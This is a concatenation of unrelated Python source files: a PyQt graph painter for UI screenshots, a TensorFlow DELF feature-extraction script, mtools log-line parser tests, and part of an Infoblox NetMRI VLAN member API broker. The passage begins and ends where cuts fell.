cur_pos_y = cur_pos_y * self.__canvas_scale
space = cell_y
index = 0
for node in groups.get(gid):
cur_pos_y = cur_pos_y + space * index
space = -space
index += 1
if cur_pos_x > self.__painter_width:
self.__painter_width = cur_pos_x
if cur_pos_y > self.__painter_height:
self.__painter_height = cur_pos_y
self.__node_pos[node] = (cur_pos_x, cur_pos_y)
col += 1
self.__painter_width = int(self.__painter_width + cell_x * 2)
self.__painter_height = int(self.__painter_height + cell_y * 2)
def get_painter_size(self):
return self.__painter_width, self.__painter_height
def add_node_button(self, from_node, button, to_node, click_num):
if self.__node_buttons.get(from_node) is None:
self.__node_buttons[from_node] = []
next_ui = dict()
next_ui["button"] = button
next_ui["end_node"] = to_node
next_ui["click_num"] = click_num
self.__node_buttons[from_node].append(next_ui)
# def ResizePixMap(self, scale):
def add_edge(self, from_node, end_node):
self.__graph.add_edge(from_node, end_node)
def add_node_image(self, node, img_path):
old_path = self.__node_images.get(node)
if old_path is not None:
self.__logger.warning("%s old path is %s", node, old_path)
self.__node_images[node] = img_path
def nodes(self):
return list(self.__graph.nodes())
def edges(self):
return list(self.__graph.edges())
def nearest_node(self, x, y, epsilon):
minDis = WIDTH
retNode = None
for node, pos in self.__node_pos.items():
disX = pos[0] - x
disY = pos[1] - y
distance = int(sqrt(disX * disX + disY * disY))
if minDis > distance and distance <= epsilon:
minDis = distance
retNode = node
return retNode
def set_show_node_image(self, flag):
self.__show_image_flag = flag
def set_canvas_scale(self, scale):
self.__canvas_scale = scale
def paint(self, painter):
self.__text_content = None
self._paint_group(painter)
self._paint_high_light_node(painter)
self._paint_select_node(painter)
self._paint_high_light_edge(painter)
self._paint_select_edge(painter)
self._update_text_edit(self.__text_content)
def _paint_group(self, painter):
for node in self.nodes():
x, y = self.__node_pos.get(node)
pixmap = self.__node_pix_map.get(node)
if pixmap is None:
path = self.__node_images.get(node)
image = QImage(path)
newImg = image.scaled(int(image.width() * self.__scale), int(image.height() * self.__scale))
pixmap = QPixmap.fromImage(newImg)
self.__node_pix_map[node] = pixmap
painter.drawPixmap(int((x - pixmap.width() / 2)), int(y - pixmap.height() / 2), pixmap)
node_buttons = self.__node_buttons.get(node) or []
leak_click = False
for button in node_buttons:
click_num = button["click_num"]
if click_num == 0:
leak_click = True
if leak_click:
pen = QPen()
pen.setColor(QColor(255, 0, 0))
pen.setWidth(3)
painter.setPen(pen)
painter.drawRect(int((x - pixmap.width() / 2)), int(y - pixmap.height() / 2),
pixmap.width(), pixmap.height())
self.__text_content = None
self.__text_content = 'ui graph images number is {}.\n'.format(len(self.nodes()))
def intersect_line(self, arrow_lines):
degree_dict = dict()
for arrow in arrow_lines:
angle = arrow.get_line().angle()
angle = angle % 180
if degree_dict.get(angle) is None:
degree_dict[angle] = []
degree_dict[angle].append(arrow)
ret_arrows = []
for angle, arrows in degree_dict.items():
size = len(arrows)
if size == 1:
ret_arrows.append(arrows[0])
else:
# Horizontal parallel, adjust y coordinate
space_x = 0
space_y = 0
if angle == 90:
space_x = DEFAULT_CELL_X / (size * 2 + 1) * self.__canvas_scale
else:
space_y = DEFAULT_CELL_Y / (size * 2 + 1) * self.__canvas_scale
index = 0
for arrow in arrows:
line = arrow.get_line()
pt1 = line.p1()
p1x = pt1.x()
p1y = pt1.y()
pt2 = line.p2()
p2x = pt2.x()
p2y = pt2.y()
offset_x = space_x * index
offset_y = space_y * index
p1x += offset_x
p1y += offset_y
p2x += offset_x
p2y += offset_y
space_x = -space_x
space_y = -space_y
index += 1
from_node = arrow.get_from_node()
end_node = arrow.get_end_node()
ret_arrows.append(ArrowLine((p1x, p1y), (p2x, p2y), from_node, end_node))
return ret_arrows
def _paint_select_node(self, painter):
self.__edge_lines.clear()
if self.__select_node is not None:
sub_graph = self.__node_neighbors.get(self.__select_node)
if sub_graph is not None:
arrows = []
for from_node, to_node in sub_graph.edges():
x1, y1 = self.__node_pos.get(from_node)
x2, y2 = self.__node_pos.get(to_node)
arrow = ArrowLine((x1, y1), (x2, y2), from_node, to_node)
arrows.append(arrow)
ret_arrows = self.intersect_line(arrows)
for arrow in ret_arrows:
arrow.paint(painter)
line = arrow.get_line()
edge = dict()
edge['line'] = line
edge['from'] = arrow.get_from_node()
edge['to'] = arrow.get_end_node()
self.__edge_lines.append(edge)
if self.__show_image_flag is True:
self._paint_node_image(painter, self.__select_node, DEFAULT_PAINT_NODE_IMG_SCALE)
self.__text_content = 'selected: {}'.format(self.__select_node)
def _paint_high_light_node(self, painter):
if self.__high_light_node is not None:
x, y = self.__node_pos.get(self.__high_light_node)
pixMap = self.__node_pix_map.get(self.__high_light_node)
line_path = QPainterPath()
width = pixMap.width()
height = pixMap.height()
line_path.moveTo(x - width / 2, y - height / 2)
line_path.lineTo(x - width / 2, y + height / 2)
line_path.lineTo(x + width / 2, y + height / 2)
line_path.lineTo(x + width / 2, y - height / 2)
line_path.lineTo(x - width / 2, y - height / 2)
painter.fillPath(line_path, DEFAULT_SELECT_IMG_FILL_COLOR)
self.__text_content = 'highlight: {}'.format(self.__high_light_node)
def _paint_edge_image(self, painter, node1, node2, scale):
path1 = self.__node_images.get(node1)
cv_image = cv2.imread(path1)
button_list = self.__node_buttons.get(node1)
for button in button_list:
node = button.get("end_node")
if node is node2:
x, y, w, h = button.get("button")
cv2.rectangle(cv_image, (x, y), (x + w, y + h), (0, 255, 0), 5)
img_rgb = cv2.cvtColor(cv_image, cv2.COLOR_BGR2BGRA)
QtImg1 = QImage(img_rgb.data, img_rgb.shape[1], img_rgb.shape[0], QImage.Format_RGB32)
_, y1 = self.__node_pos.get(node1)
_, y2 = self.__node_pos.get(node2)
pixmap1 = QPixmap.fromImage(QtImg1)
# pixmap = QPixmap.fromImage(QImage(path))
width1 = int(scale * pixmap1.width())
height1 = int(scale * pixmap1.height())
pixmap1 = pixmap1.scaled(width1, height1, Qt.KeepAspectRatio)
x1 = int(WIDTH * 0.15)
# y1 = int(HEIGHT * 0.25)
painter.drawPixmap(x1, int( (y1 + y2) / 2), pixmap1)
path2 = self.__node_images.get(node2)
pixmap2 = QPixmap.fromImage(QImage(path2))
width2 = int(scale * pixmap2.width())
height2 = int(scale * pixmap2.height())
pixmap2 = pixmap2.scaled(width2, height2, Qt.KeepAspectRatio)
x2 = int(WIDTH * 0.55)
# y2 = int(HEIGHT * 0.25)
painter.drawPixmap(x2, int((y1 + y2) / 2), pixmap2)
def _paint_node_image(self, painter, node, scale):
path = self.__node_images.get(node)
cv_image = cv2.imread(path)
# buttonList = []
button_list = self.__node_buttons.get(node) or []
for button in button_list:
x, y, w, h = button.get("button")
click_num = button.get("click_num")
if click_num == 0:
color = (0, 0, 255)
else:
color = (0, 255, 0)
cv2.rectangle(cv_image, (x, y), (x + w, y + h), color, 5)
img_rgb = cv2.cvtColor(cv_image, cv2.COLOR_BGR2BGRA)
QtImg = QImage(img_rgb.data, img_rgb.shape[1], img_rgb.shape[0], QImage.Format_RGB32)
x, y = self.__node_pos.get(node)
# pixmap = QPixmap.fromImage(QImage(path))
pixmap = QPixmap.fromImage(QtImg)
width = int(scale * pixmap.width())
height = int(scale * pixmap.height())
pixmap = pixmap.scaled(width, height, Qt.KeepAspectRatio)
painter.drawPixmap(x, y, pixmap)
def _paint_high_light_edge(self, painter):
if self.__high_light_edge:
x1 = self.__high_light_edge['line'].p1().x()
y1 = self.__high_light_edge['line'].p1().y()
x2 = self.__high_light_edge['line'].p2().x()
y2 = self.__high_light_edge['line'].p2().y()
pen = QPen()
pen.setWidth(DEFAULT_SELECT_EDGE_PEN_WIDTH)
pen.setColor(DEFAULT_SELECT_EDGE_FILL_COLOR)
painter.setPen(pen)
painter.drawLine(x1, y1, x2, y2)
self.__text_content = 'highlight: {} ---> {}'.format(self.__high_light_edge.get("from"),
self.__high_light_edge.get("to"))
def _paint_select_edge(self, painter):
if self.__select_edge is not None:
from_node = self.__select_edge.get("from")
to_node = self.__select_edge.get("to")
self._paint_edge_image(painter, from_node, to_node, DEFAULT_PAINT_EDGE_IMG_SCALE)
self.__text_content = 'selected: {} ---> {}'.format(from_node, to_node)
def set_select_node(self, node):
self.__select_node = node
def clear_select_node(self):
self.__select_node = None
def set_high_light_node(self, node):
self.__high_light_node = node
def clear_highlight_node(self):
self.__high_light_node = None
def nearest_edge(self, x, y, epsilon):
min_dis = WIDTH
ret_edge = None
for item in self.__edge_lines:
x1 = item['line'].p1().x()
y1 = item['line'].p1().y()
x2 = item['line'].p2().x()
y2 = item['line'].p2().y()
distance = self._point_to_line(x, y, x1, y1, x2, y2)
if min_dis > distance and distance <= epsilon:
min_dis = distance
ret_edge = item
return ret_edge
def set_select_edge(self, edge):
self.__select_edge = edge
def clear_select_edge(self):
self.__select_edge = None
def set_highlight_edge(self, edge):
self.__high_light_edge = edge
def clear_high_light_edge(self):
self.__high_light_edge = None
@staticmethod
def _point_to_line(x, y, x1, y1, x2, y2):
# given point A(x1, y1),B(x2, y2), computer distance of point C (x, y) to |AB|
# | AB | * | AC |* cos(x)
cross = (x2 - x1) * (x - x1) + (y2 - y1) * (y - y1)
# cos(x) < 0 , the degree of angle(AB, AC) no less than 90 degree
# distance = |AC|
if cross <= 0:
return math.sqrt((x - x1) * (x - x1) + (y - y1) * (y - y1) + 0.0)
# | AB |
d2 = (x2 - x1) * (x2 - x1) + (y2 - y1) * (y2 - y1)
# |AC| >= |AB|, the degree of angle((BA, BC)) no less than 90 degree
# distance = |BC|
if cross >= d2:
return math.sqrt((x - x2) * (x - x2) + (y - y2) * (y - y2))
r = cross / d2
# D(px,py) in AB, and AD is perpendicular to AB
px = x1 + (x2 - x1) * r
py = y1 + (y2 - y1) * r
return math.sqrt((x - px) * (x - px) + (y - py) * (y - py))
def find_longest_path(self, dst_node):
path = dict(nx.all_pairs_shortest_path(self.__graph))
max_len = 0
path_nodes = []
for src_node in self.__graph.nodes:
node_list = path[src_node].get(dst_node) or []
if len(node_list) > max_len:
max_len = len(node_list)
path_nodes = node_list
return path_nodes
def _neighbors2(self):
path = dict(nx.all_pairs_shortest_path(self.__graph))
root_node = DEFAULT_ROOT_NODE
if root_node not in path.keys():
self.__logger.error("rootNode is not keys")
return
sum_no_path = 0
for node in self.__graph.nodes:
node_list = path[root_node].get(node)
if node_list is None:
self.__logger.error("there is no path %s---->%s", root_node, node)
sum_no_path += 1
node_list = self.find_longest_path(node)
graph = nx.DiGraph()
pre_node = None
for subNode in node_list:
if pre_node is None:
pre_node = subNode
continue
else:
graph.add_edge(pre_node, subNode)
pre_node = subNode
self.__node_neighbors[node] = graph
self.__logger.error("sum number of no path from root is %s", sum_no_path)
def set_text_edit(self, text_edit):
self.__text_edit = text_edit
@staticmethod
def _update_text_edit(text):
# print(text)
set_log_text(text)
|
# Copyright 2017 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
This script is forked from tensorflow-delf !
https://github.com/tensorflow/models/tree/master/research/delf
"""
import os
import time
from tqdm import tqdm
import tensorflow as tf
from google.protobuf import text_format
from delf import delf_config_pb2
from delf import feature_extractor
from delf import feature_io
cmd_args = None
# Extension of feature files.
_DELF_EXT = '.delf'
# Pace to report extraction log.
_STATUS_CHECK_ITERATIONS = 100
def _ReadImageList(list_path):
"""Helper function to read image paths.
Args:
list_path: Path to list of images, one image path per line.
Returns:
image_paths: List of image paths.
"""
with tf.gfile.GFile(list_path, 'r') as f:
image_paths = f.readlines()
image_paths = [entry.rstrip() for entry in image_paths]
return image_paths
def main(data_type, dir_input='../../input'):
tf.logging.set_verbosity(tf.logging.INFO)
# Read list of images.
tf.logging.info('Reading list of images...')
list_images_path = os.path.join(dir_input, data_type)
image_names = os.listdir(list_images_path)
image_paths = [os.path.join(list_images_path, s) for s in image_names]
num_images = len(image_paths)
tf.logging.info('done! Found %d images', num_images)
# Parse DelfConfig proto.
config = delf_config_pb2.DelfConfig()
config_path = 'delf_config_example.pbtxt'
with tf.gfile.FastGFile(config_path, 'r') as f:
text_format.Merge(f.read(), config)
# Create output directory if necessary.
dir_output = os.path.join('../../input_large_delf', '{}'.format(data_type))
os.makedirs(dir_output, exist_ok=True)
config_session = tf.ConfigProto(gpu_options=tf.GPUOptions(allow_growth=True))
# Tell TensorFlow that the model will be built into the default Graph.
with tf.Graph().as_default():
# Reading list of images.
filename_queue = tf.train.string_input_producer(image_paths, shuffle=False)
reader = tf.WholeFileReader()
_, value = reader.read(filename_queue)
image_tf = tf.image.decode_jpeg(value, channels=3)
with tf.Session(config=config_session) as sess:
# Initialize variables.
init_op = tf.global_variables_initializer()
sess.run(init_op)
# Loading model that will be used.
tf.saved_model.loader.load(sess, [tf.saved_model.tag_constants.SERVING], config.model_path)
graph = tf.get_default_graph()
input_image = graph.get_tensor_by_name('input_image:0')
input_score_threshold = graph.get_tensor_by_name('input_abs_thres:0')
input_image_scales = graph.get_tensor_by_name('input_scales:0')
input_max_feature_num = graph.get_tensor_by_name('input_max_feature_num:0')
boxes = graph.get_tensor_by_name('boxes:0')
raw_descriptors = graph.get_tensor_by_name('features:0')
feature_scales = graph.get_tensor_by_name('scales:0')
attention_with_extra_dim = graph.get_tensor_by_name('scores:0')
attention = tf.reshape(attention_with_extra_dim,
[tf.shape(attention_with_extra_dim)[0]])
locations, descriptors = feature_extractor.DelfFeaturePostProcessing(boxes, raw_descriptors, config)
# Start input enqueue threads.
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(sess=sess, coord=coord)
start = time.clock()
for i in tqdm(range(num_images), total=num_images):
# Write to log-info once in a while.
if i == 0:
tf.logging.info('Starting to extract DELF features from images...')
elif i % _STATUS_CHECK_ITERATIONS == 0:
elapsed = (time.clock() - start)
tf.logging.info('Processing image %d out of %d, last %d '
'images took %f seconds', i, num_images,
_STATUS_CHECK_ITERATIONS, elapsed)
start = time.clock()
# Get next image.
im = sess.run(image_tf)
# If descriptor already exists, skip its computation.
out_desc_filename = os.path.splitext(os.path.basename(image_paths[i]))[0] + _DELF_EXT
out_desc_fullpath = os.path.join(dir_output, out_desc_filename)
if tf.gfile.Exists(out_desc_fullpath):
tf.logging.info('Skipping %s', image_paths[i])
continue
# Extract and save features.
(locations_out, descriptors_out, feature_scales_out, attention_out) = sess.run(
[locations, descriptors, feature_scales, attention],
feed_dict={
input_image: im,
input_score_threshold: config.delf_local_config.score_threshold,
input_image_scales: list(config.image_scales),
input_max_feature_num: config.delf_local_config.max_feature_num
})
feature_io.WriteToFile(out_desc_fullpath, locations_out,
feature_scales_out, descriptors_out, attention_out)
# Finalize enqueue threads.
coord.request_stop()
coord.join(threads)
if __name__ == '__main__':
main('train')
main('index')
main('test')
|
<filename>mtools/test/test_util_logline.py
import sys
from nose.tools import *
from mtools.util.logline import LogLine
import time
line_ctime_pre24 = "Sat Aug 3 21:52:05 [initandlisten] db version v2.2.4, pdfile version 4.5"
line_ctime = "Sat Aug 3 21:52:05.995 [initandlisten] db version v2.4.5"
line_iso8601_local = "2013-08-03T21:52:05.995+1000 [initandlisten] db version v2.5.2-pre-"
line_iso8601_utc = "2013-08-03T11:52:05.995Z [initandlisten] db version v2.5.2-pre-"
line_getmore = "Mon Aug 5 20:26:32 [conn9] getmore local.oplog.rs query: { ts: { $gte: new Date(5908578361554239489) } } cursorid:1870634279361287923 ntoreturn:0 keyUpdates:0 numYields: 107 locks(micros) r:85093 nreturned:13551 reslen:230387 144ms"
line_253_numYields = "2013-10-21T12:07:27.057+1100 [conn2] query test.docs query: { foo: 234333.0 } ntoreturn:0 ntoskip:0 keyUpdates:0 numYields:1 locks(micros) r:239078 nreturned:0 reslen:20 145ms"
line_246_numYields = "Mon Oct 21 12:14:21.888 [conn4] query test.docs query: { foo: 23432.0 } ntoreturn:0 ntoskip:0 nscanned:316776 keyUpdates:0 numYields: 2405 locks(micros) r:743292 nreturned:2 reslen:2116 451ms"
def test_logline_datetime_parsing():
""" Check that all four timestamp formats are correctly parsed. """
ll = LogLine(line_ctime_pre24)
ll_str = ll.line_str
assert(str(ll.datetime) == '2013-08-03 21:52:05')
assert(ll._datetime_format == 'ctime-pre2.4')
print ll_str
print ll.line_str
assert(ll.line_str == ll_str)
ll = LogLine(line_ctime)
ll_str = ll.line_str
assert(str(ll.datetime) == '2013-08-03 21:52:05.995000')
assert(ll._datetime_format == 'ctime')
assert(ll.line_str == ll_str)
ll = LogLine(line_iso8601_utc)
ll_str = ll.line_str
assert(str(ll.datetime) == '2013-08-03 11:52:05.995000+00:00')
assert(ll._datetime_format == 'iso8601-utc')
assert(ll.line_str == ll_str)
ll = LogLine(line_iso8601_local)
ll_str = ll.line_str
assert(str(ll.datetime) == '2013-08-03 21:52:05.995000+10:00')
assert(ll._datetime_format == 'iso8601-local')
assert(ll.line_str == ll_str)
def test_logline_extract_new_and_old_numYields():
ll = LogLine(line_246_numYields)
assert(ll.numYields == 2405)
ll = LogLine(line_253_numYields)
assert(ll.numYields == 1)
def test_logline_value_extraction():
""" Check for correct value extraction of all fields. """
ll = LogLine(line_getmore)
assert(ll.thread == 'conn9')
assert(ll.operation == 'getmore')
assert(ll.namespace == 'local.oplog.rs')
assert(ll.duration == 144)
assert(ll.numYields == 107)
assert(ll.r == 85093)
assert(ll.ntoreturn == 0)
assert(ll.nreturned == 13551)
assert(ll.pattern == '{ts: 1}')
def test_logline_lazy_evaluation():
""" Check that all LogLine variables are evaluated lazily. """
fields = ['_thread', '_operation', '_namespace', '_duration', '_numYields', '_r', '_ntoreturn', '_nreturned', '_pattern']
# before parsing all member variables need to be None
ll = LogLine(line_getmore)
for attr in fields:
assert(getattr(ll, attr) == None)
# after parsing, they all need to be filled out
ll.parse_all()
for attr in fields:
assert(getattr(ll, attr) != None)
|
<filename>infoblox_netmri/api/broker/v3_8_0/vlan_member_broker.py
from ..broker import Broker
class VlanMemberBroker(Broker):
controller = "vlan_members"
def show(self, **kwargs):
"""Shows the details for the specified vlan member.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of vlan member methods. The listed methods will be called on each vlan member returned and included in the output. Available methods are: network_id, data_source, device, interface, vlan.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source, device, interface, vlan.
:type include: Array of String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return vlan_member: The vlan member identified by the specified VlanMemberID.
:rtype vlan_member: VlanMember
"""
return self.api_request(self._get_method_fullname("show"), kwargs)
def index(self, **kwargs):
"""Lists the available vlan members. Any of the inputs listed may be be used to narrow the list; other inputs will be ignored. Of the various ways to query lists, using this method is most efficient.
**Inputs**
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device associated with this VLAN membership.
:type DeviceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device associated with this VLAN membership.
:type DeviceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VlanID: The internal NetMRI identifier of the VLAN associated with this VLAN membership.
:type VlanID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VlanID: The internal NetMRI identifier of the VLAN associated with this VLAN membership.
:type VlanID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the vlan members as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of vlan member methods. The listed methods will be called on each vlan member returned and included in the output. Available methods are: network_id, data_source, device, interface, vlan.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source, device, interface, vlan.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` VlanMemberID
:param sort: The data field(s) to use for sorting the output. Default is VlanMemberID. Valid values are VlanMemberID, VlanMemberStartTime, VlanMemberEndTime, VlanMemberChangedCols, VlanMemberTimestamp, DataSourceID, DeviceID, VlanID, InterfaceID, BridgeMemberInd, VlanState, VlanType, VlanName, VTPDomain, RootBridgeAddress, BaseBridgeAddress, BaseNumPorts, StpDesignatedRoot, StpProtocolSpecification, StpPriority, StpTopChanges, StpRootCost, StpRootPort, StpMaxAge, StpHelloTime, StpHoldTime, StpForwardDelay, StpBridgeMaxAge, StpBridgeHelloTime, StpBridgeForwardDelay.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each VlanMember. Valid values are VlanMemberID, VlanMemberStartTime, VlanMemberEndTime, VlanMemberChangedCols, VlanMemberTimestamp, DataSourceID, DeviceID, VlanID, InterfaceID, BridgeMemberInd, VlanState, VlanType, VlanName, VTPDomain, RootBridgeAddress, BaseBridgeAddress, BaseNumPorts, StpDesignatedRoot, StpProtocolSpecification, StpPriority, StpTopChanges, StpRootCost, StpRootPort, StpMaxAge, StpHelloTime, StpHoldTime, StpForwardDelay, StpBridgeMaxAge, StpBridgeHelloTime, StpBridgeForwardDelay. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NetworkID: The network id to which results would be limited.
:type NetworkID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return vlan_members: An array of the VlanMember objects that match the specified input criteria.
:rtype vlan_members: Array of VlanMember
"""
return self.api_list_request(self._get_method_fullname("index"), kwargs)
def search(self, **kwargs):
"""Lists the available vlan members matching the input criteria. This method provides a more flexible search interface than the index method, but searching using this method is more demanding on the system and will not perform to the same level as the index method. The input fields listed below will be used as in the index method, to filter the result, along with the optional query string and XML filter described below.
**Inputs**
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param BaseBridgeAddress: The spanning tree protocol base bridge address of this bridge. Empty for non-bridge members.
:type BaseBridgeAddress: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param BaseBridgeAddress: The spanning tree protocol base bridge address of this bridge. Empty for non-bridge members.
:type BaseBridgeAddress: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param BaseNumPorts: The number of ports on this bridge. Empty for non-bridge members.
:type BaseNumPorts: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param BaseNumPorts: The number of ports on this bridge. Empty for non-bridge members.
:type BaseNumPorts: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param BridgeMemberInd: A flag indicating that this VLAN membership record represents a bridge device's configuration entry for the VLAN; that is, that this membership record is for a bridge participating in the VLAN, as opposed to a device attached to an access port.
:type BridgeMemberInd: Boolean
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param BridgeMemberInd: A flag indicating that this VLAN membership record represents a bridge device's configuration entry for the VLAN; that is, that this membership record is for a bridge participating in the VLAN, as opposed to a device attached to an access port.
:type BridgeMemberInd: Array of Boolean
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
:type DataSourceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
:type DataSourceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device associated with this VLAN membership.
:type DeviceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device associated with this VLAN membership.
:type DeviceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param InterfaceID: The internal NetMRI identifier for the switched virtual interface for this VLAN on this device.
:type InterfaceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param InterfaceID: The internal NetMRI identifier for the switched virtual interface for this VLAN on this device.
:type InterfaceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param RootBridgeAddress: The spanning tree protocol root bridge address; this is the designated root with the STP priority portion removed. Empty for non-bridge members.
:type RootBridgeAddress: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param RootBridgeAddress: The spanning tree protocol root bridge address; this is the designated root with the STP priority portion removed. Empty for non-bridge members.
:type RootBridgeAddress: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StpBridgeForwardDelay: The value that all bridges use for ForwardDelay when this bridge is acting as the root. Empty for non-bridge members.
:type StpBridgeForwardDelay: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StpBridgeForwardDelay: The value that all bridges use for ForwardDelay when this bridge is acting as the root. Empty for non-bridge members.
:type StpBridgeForwardDelay: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StpBridgeHelloTime: The value that all bridges use for HelloTime when this bridge is acting as the root. Empty for non-bridge members.
:type StpBridgeHelloTime: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StpBridgeHelloTime: The value that all bridges use for HelloTime when this bridge is acting as the root. Empty for non-bridge members.
:type StpBridgeHelloTime: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StpBridgeMaxAge: The value that all bridges use for MaxAge when this bridge is acting as the root. Empty for non-bridge members.
:type StpBridgeMaxAge: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StpBridgeMaxAge: The value that all bridges use for MaxAge when this bridge is acting as the root. Empty for non-bridge members.
:type StpBridgeMaxAge: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StpDesignatedRoot: The bridge identifier for this bridge. Empty for non-bridge members.
:type StpDesignatedRoot: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StpDesignatedRoot: The bridge identifier for this bridge. Empty for non-bridge members.
:type StpDesignatedRoot: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StpForwardDelay: This time value, measured in units of hundredths of a second, controls how fast a port changes its spanning state when moving towards the Forwarding state. The value determines how long the port stays in each of the Listening and Learning states, which precede the Forwarding state. This value is also used when a topology change has been detected and is underway, to age all dynamic entries in the Forwarding Database. This is the value currently in use on this bridge. Empty for non-bridge members.
:type StpForwardDelay: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
